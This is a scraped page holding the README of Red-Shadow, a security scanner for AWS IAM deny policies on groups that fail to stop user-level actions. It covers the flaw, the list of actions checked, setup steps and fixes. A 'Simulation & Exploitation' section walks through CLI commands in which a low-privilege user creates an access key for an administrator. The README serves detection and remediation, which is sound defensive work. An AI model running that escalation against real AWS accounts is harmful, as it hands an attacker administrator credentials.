Lightspin AWS IAM Vulnerability Scanner

Related tags

Data Visualizationred-shadow
Overview

red-shadow

Red-Shadow

Lightspin AWS IAM Vulnerability Scanner

Description

Scan your AWS IAM Configuration for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups discovered by Lightspin's Security Research Team.

The tool detects the misconfigurations in the following IAM Objects:

  • Managed Policies

  • Users Inline Policies

  • Groups Inline Policies

  • Roles Inline Policies

Research Summary

AWS IAM evaluation logic for deny policies applied to groups does not work the same way as most security engineers may be used to with other authorization mechanisms.

Suppose a policy with a group resource has an explicit deny. In that case, this will only impact group actions and not user actions, opening organizations up to misconfiguration and vulnerabilities if they assume the process to be the same as with Active Directory, for example.

Example for vulnerable json policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "ProtectManagersByDeny",
            "Effect": "Deny",
            "Action": "*",
            "Resource": "arn:aws:iam::123456789999:group/managers"
        }
    ]
}

In this example, the policy should deny any iam action done by users, groups, or roles with that policy attached to, towards the group called managers.

The fact is that simple IAM action like iam:ChangePassword would work as the deny policy is ineffective.

Link to the full security research blog

Detection

AWS IAM has a clear seperation between user object actions and group object actions.

The following list includes the user object actions the tool is scanning over deny policies affecting groups (besides wildcard):

AWS_USER_ACTIONS = ["iam:CreateUser",
                     "iam:GetUser",
                     "iam:UpdateUser",
                     "iam:DeleteUser",
                     "iam:GetUserPolicy",
                     "iam:PutUserPolicy",
                     "iam:DeleteUserPolicy",
                     "iam:ListUserPolicies",
                     "iam:AttachUserPolicy",
                     "iam:DetachUserPolicy",
                     "iam:ListAttachedUserPolicies",
                     "iam:SimulatePrincipalPolicy",
                     "iam:GetContextKeysForPrincipalPolicy",
                     "iam:TagUser",
                     "iam:UpdateSSHPublicKey",
                     "iam:UntagUser",
                     "iam:GetSSHPublicKey",
                     "iam:ListUserTags",
                     "iam:DeleteSSHPublicKey",
                     "iam:GetLoginProfile",
                     "iam:GetAccessKeyLastUsed",
                     "iam:UpdateLoginProfile",
                     "iam:UploadSigningCertificate",
                     "iam:DeleteLoginProfile",
                     "iam:ListSigningCertificates",
                     "iam:CreateLoginProfile",
                     "iam:UpdateSigningCertificate",
                     "iam:EnableMFADevice",
                     "iam:DeleteSigningCertificate",
                     "iam:ResyncMFADevice",
                     "iam:ListServiceSpecificCredentials",
                     "iam:ListMFADevices",
                     "iam:ResetServiceSpecificCredential",
                     "iam:DeactivateMFADevice",
                     "iam:CreateServiceSpecificCredential",
                     "iam:ChangePassword",
                     "iam:UpdateServiceSpecificCredential",
                     "iam:CreateAccessKey",
                     "iam:DeleteServiceSpecificCredential",
                     "iam:ListAccessKeys",
                     "iam:PutUserPermissionsBoundary",
                     "iam:UpdateAccessKey",
                     "iam:DeleteUserPermissionsBoundary",
                     "iam:DeleteAccessKey",
                     "iam:ListGroupsForUser",
                     "iam:ListSSHPublicKeys",
                     "iam:UploadSSHPublicKey"]

Many of the user object actions mentioned above can easily lead to a privilege escalation or compromising the account, such as resetting the admin's password, deactivating the root account MFA, and more.

Requirements

Red-Shadow is built with Python 3 and Boto3.

The tool requires:

Installation

sudo git clone https://github.com/lightspin-tech/red-shadow.git
cd red-shadow
pip3 install -r requirements.txt

Usage

python3 red-shadow.py

Analyze Results

The results discover any IAM object that is vulnerable to such authorization bypass in AWS.

Example of results output:

++ Starting Red-Shadow ++

++ AWS IAM Vulnerability Scanner
++ Red Shadow scans for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups

Step 1: Searching for IAM Group misconfigurations in managed policies
Found potential misconfiguration at arn:aws:iam::123456789999:policy/ProtectManagers
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 2: Searching for IAM Group misconfigurations in Users inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 3: Searching for IAM Group misconfigurations in Groups inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 4: Searching for IAM Group misconfigurations in Roles inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Done

In this console output, we can see that our ProtectManagers deny policy is ineffective and vulnerable to attacks such as privilege escalation mentioned above.

Simulation & Exploitation

To validate the IAM Vulnerability and run the exploitation you can run the following flow:

  1. aws iam create-group --group-name managers
  2. aws iam attach-group-policy --group-name managers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
  3. aws iam create-user --user-name JohnAdmin
  4. aws iam add-user-to-group --user-name JohnAdmin --group-name managers
  5. create a policy.json file with the contents below (replace the account id):
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ProtectManagersByDeny",
      "Effect": "Deny",
      "Action": "*",
      "Resource": "arn:aws:iam::123456789999:group/managers"
    }
  ]
}
  1. aws iam create-policy --policy-name ProtectManagers --policy-document file://policy.json
  2. aws iam create-group --group-name backend-dev
  3. aws iam create-user --user-name BobAttacker
  4. aws iam add-user-to-group --user-name BobAttacker --group-name backend-dev
  5. aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/ProtectManagers
  6. Create a policy to allow the users to create access keys in policy_iam.json file for the backend-dev group:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "iam:CreateAccessKey",
            "Resource": "*"
        }
    ]
}
  1. aws iam create-policy --policy-name devCreateAccessKeys --policy-document file://policy_iam.json
  2. aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/devCreateAccessKeys
  3. Validate our configuration using: aws iam list-attached-group-policies --group backend-dev
  4. aws iam create-access-key --user-name BobAttacker
  5. Configure the new access key and secret in aws profile (locan env)
  6. Now the user BobAttacker can create access key for all resources but has an explicit deny for the managers group.

Lets Exploit the vulnerability using:

aws iam create-access-key --user-name JohnAdmin --profile BobAttacker

Privilege Escalation Complete!

Remediation

Once you have found the policies vulnerable to the authorization bypass, there are two possible ways to remediate the vulnerability and fix the policy:

OPTION 1: Define all relevant users in the resource field instead of groups to avoid ineffective iam actions, and deny all group actions, such as the following example:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenySpecificUserActions",
            "Effect": "Deny",
            "Action": [
                "iam:CreateLoginProfile",
                "iam:ChangePassword",
                "iam:CreateAccessKey"
            ],
            "Resource": [
                "arn:aws:iam::123456789999:user/[email protected]",
                "arn:aws:iam::123456789999:user/[email protected]",
                "arn:aws:iam::123456789999:user/[email protected]"
            ]
        },
        {
            "Sid": "DenyAllGroupActions",
            "Effect": "Deny",
            "Action": "*",
            "Resource": "arn:aws:iam::123456789999:group/managers"
        }
    ]
}

OPTION 2: Use condition in the policy with iam:ResourceTag in place such as the following example:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Deny",
            "Action": [
                "iam:CreateLoginProfile",
                "iam:ChangePassword",
                "iam:CreateAccessKey"
            ],
            "Resource": "*",
            "Condition": {
                "ForAnyValue:StringEquals": {
                    "iam:ResourceTag/group": "managers"
                }
            }
        }
    ]
}

Contact Us

This research was held by Lightspin's Security Research Team. For more information, contact us at [email protected].

License

This repository is available under the Apache License 2.0.

Owner
Lightspin
Take Your Cloud Security Beyond Compliance
Lightspin
GitHub Repository
Investment and risk technologies maintained by Fortitudo Technologies.

Fortitudo Technologies Open Source This package allows you to freely explore open-source implementations of some of our fundamental technologies under

Fortitudo Technologies 11 Dec 14, 2022
Joyplots in Python with matplotlib & pandas :chart_with_upwards_trend:

JoyPy JoyPy is a one-function Python package based on matplotlib + pandas with a single purpose: drawing joyplots (a.k.a. ridgeline plots). The code f

Leonardo Taccari 462 Jan 02, 2023
EPViz is a tool to aid researchers in developing, validating, and reporting their predictive modeling outputs.

EPViz (EEG Prediction Visualizer) EPViz is a tool to aid researchers in developing, validating, and reporting their predictive modeling outputs. A lig

Jeff 2 Oct 19, 2022
Create a visualization for Trump's Tweeted Words Using Python

Data Trump's Tweeted Words This plot illustrates twitter word occurences. We already did the coding I needed for this plot, so I was very inspired to

7 Mar 27, 2022
📊 Extensions for Matplotlib

📊 Extensions for Matplotlib

Nico Schlömer 519 Dec 30, 2022
A gui application to visualize various sorting algorithms using pure python.

Sorting Algorithm Visualizer A gui application to visualize various sorting algorithms using pure python. Language : Python 3 Libraries required Tkint

Rajarshi Banerjee 19 Nov 30, 2022
Missing data visualization module for Python.

missingno Messy datasets? Missing values? missingno provides a small toolset of flexible and easy-to-use missing data visualizations and utilities tha

Aleksey Bilogur 3.4k Dec 29, 2022
This is a Boids Simulation, written in Python with Pygame.

PyNBoids A Python Boids Simulation This is a Boids simulation, written in Python3, with Pygame2 and NumPy. To use: Save the pynboids_sp.py file (and n

Nik 17 Dec 18, 2022
Tools for exploratory data analysis in Python

Dora Exploratory data analysis toolkit for Python. Contents Summary Setup Usage Reading Data & Configuration Cleaning Feature Selection & Extraction V

Nathan Epstein 599 Dec 25, 2022
HW 2: Visualizing interesting datasets

HW 2: Visualizing interesting datasets Check out the project instructions here! Mean Earnings per Hour for Males and Females My first graph uses data

7 Oct 27, 2021
A GUI for Pandas DataFrames

PandasGUI A GUI for analyzing Pandas DataFrames. Demo Installation Install latest release from PyPi: pip install pandasgui Install directly from Githu

Adam 2.8k Jan 03, 2023
Create a table with row explanations, column headers, using matplotlib

Create a table with row explanations, column headers, using matplotlib. Intended usage was a small table containing a custom heatmap.

4 Aug 14, 2022
Epagneul is a tool to visualize and investigate windows event logs

epagneul Epagneul is a tool to visualize and investigate windows event logs. Dep

jurelou 190 Dec 13, 2022
coordinate to draw the nimbus logo on the graffitiwall

This is a community effort to draw the nimbus logo on beaconcha.in's graffitiwall. get started clone repo with git clone https://github.com/tennisbowl

4 Apr 04, 2022
Graphical display tools, to help students debug their class implementations in the Carcassonne family of projects

carcassonne_tools Graphical display tools, to help students debug their class implementations in the Carcassonne family of projects NOTE NOTE NOTE The

1 Nov 08, 2021
Massively parallel self-organizing maps: accelerate training on multicore CPUs, GPUs, and clusters

Somoclu Somoclu is a massively parallel implementation of self-organizing maps. It exploits multicore CPUs, it is able to rely on MPI for distributing

Peter Wittek 239 Nov 10, 2022
Visualizing weather changes across the world using third party APIs and Python.

WEATHER FORECASTING ACROSS THE WORLD Overview Python scripts were created to visualize the weather for over 500 cities across the world at varying di

G Johnson 0 Jun 12, 2021
Streamlit component for Let's-Plot visualization library

streamlit-letsplot This is a work-in-progress, providing a convenience function to plot charts from the Lets-Plot visualization library. Example usage

Randy Zwitch 9 Nov 03, 2022
plotly scatterplots which show molecule images on hover!

molplotly Plotly scatterplots which show molecule images on hovering over the datapoints! Required packages: pandas rdkit jupyter_dash ➡️ See example.

150 Dec 28, 2022
Main repository for Vispy

VisPy: interactive scientific visualization in Python Main website: http://vispy.org VisPy is a high-performance interactive 2D/3D data visualization

vispy 3k Jan 03, 2023